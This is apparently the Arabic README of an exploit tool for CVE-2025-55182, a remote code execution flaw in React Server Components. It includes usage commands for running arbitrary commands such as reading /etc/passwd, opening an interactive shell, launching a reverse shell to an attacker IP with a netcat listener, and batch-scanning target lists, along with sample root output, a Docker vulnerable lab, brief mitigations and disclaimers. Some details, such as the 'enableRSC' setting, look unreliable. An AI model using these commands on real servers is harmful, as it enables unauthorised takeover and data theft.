استغلال قائم على Python لـ CVE-2025-55182 (RCE في React Server Components) مع قشرة تفاعلية وقشرة عكسية وفحص دفعة وبيئة ضعيفة قائمة على Docker لاختبار الأمان المصرح به.
⚠️ إخلاء مسؤولية قانوني: هذه الأداة مخصصة لأغراض البحث الأمني واختبار الاختراق المصرح به والتعليم فقط. استخدام هذه الأداة ضد أي نظام دون إذن صريح هو غير قانوني وغير أخلاقي.
CVE-2025-55182 هي ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في مكونات خادم React (RSC)، تسمح لمهاجم غير مصادق عليه بتنفيذ تعليمات برمجية عشوائية على الخادم من خلال إلغاء تسلسل ضار لكائنات JavaScript.
| الخاصية | القيمة |
|---|
| معرف CVE | CVE-2025-55182 |
| درجة CVSS | 9.8 (حرجة) |
| متجه الهجوم | شبكة |
| تعقيد الهجوم | منخفض |
| الصلاحيات المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
| التأثير | عالي (السرية، التكامل، التوفر) |
| المكون المتأثر | مكونات خادم React (RSC) |
| الإصدارات المتأثرة | React 18.x - 19.x (إصدارات بناء محددة) |
| تاريخ الإفصاح | 3 ديسمبر 2025 |
| اسم مستعار لـ CVE | React2Shell |
السبب الجذري: تقوم مكونات خادم React بإلغاء تسلسل كائنات JavaScript المقدمة من المستخدم بشكل غير صحيح عند معالجة حمولات RSC، مما يسمح للمهاجم بحقن تعليمات برمجية ضارة يتم تنفيذها على الخادم.
متجه الهجوم: حمولات RSC ضارة في طلبات HTTP التأثير: تنفيذ تعليمات برمجية عن بُعد بدون مصادقة، السيطرة على الخادم، تسرب البيانات
# استنساخ المستودع
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# تثبيت التبعيات
pip install -r requirements.txt
# تثبيت التبعيات
pip install requests
# تنفيذ أمر على الهدف الضعيف
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# وضع القشرة التفاعلية
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# أمر مخصص
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# إنشاء قشرة عكسية باستخدام IP/Port مخصص
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# فحص جماعي
python exploit/batch_scanner.py -f targets.txt
# وضع التفصيل
python exploit/cve_2025_55182.py -u http://target.com -v
# User-Agent مخصص
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
الوصول إلى التطبيق الضعيف: http://localhost:3000
تنفيذ أمر واحد على الخادم الضعيف:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
المخرجات المتوقعة:
[+] تم الكشف عن الثغرة بنجاح: React Server Components RCE
[+] تنفيذ الأمر: id
[+] الرد:
uid=0(root) gid=0(root) groups=0(root)
الحصول على قشرة تفاعلية على الخادم الضعيف:
python exploit/cve_2025_55182.py -u http://target.com --shell
الميزات:
إنشاء اتصال قشرة عكسية:
# على جهاز المهاجم
nc -lvnp 4444
# تشغيل أداة الاستغلال
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
فحص أهداف متعددة بحثًا عن الثغرة:
# إنشاء ملف الأهداف
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# تشغيل الفاحص الجماعي
python exploit/batch_scanner.py -f targets.txt
تحديث React
npm install react@latest
# الترقية إلى الإصدار المصحح
حظر طلبات RSC
// تعطيل RSC مؤقتًا
const config = {
enableRSC: false
}
قواعد WAF
# إعداد البيئة الضعيفة
cd target && docker-compose up -d
# اختبار الثغرة
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# تشغيل مجموعة الاختبارات
python tests/test_exploit.py
توضح هذه الأداة:
هذا المشروع مرخص بموجب رخصة MIT - انظر ملف LICENSE للحصول على التفاصيل.
هام: هذه الأداة مخصصة فقط لأغراض الاختبارات الأمنية التعليمية والمصرح بها.
باستخدام هذه الأداة، أنت توافق على:
إذا وجدت هذه الثغرة في أنظمة إنتاج:
الإبلاغ للبائع
تخصيص CVE
المجتمع الأمني
تذكر: يجب أن يكون البحث الأمني دائمًا أخلاقيًا وقانونيًا. استخدم مهاراتك لجعل الإنترنت أكثر أمانًا! 🛡️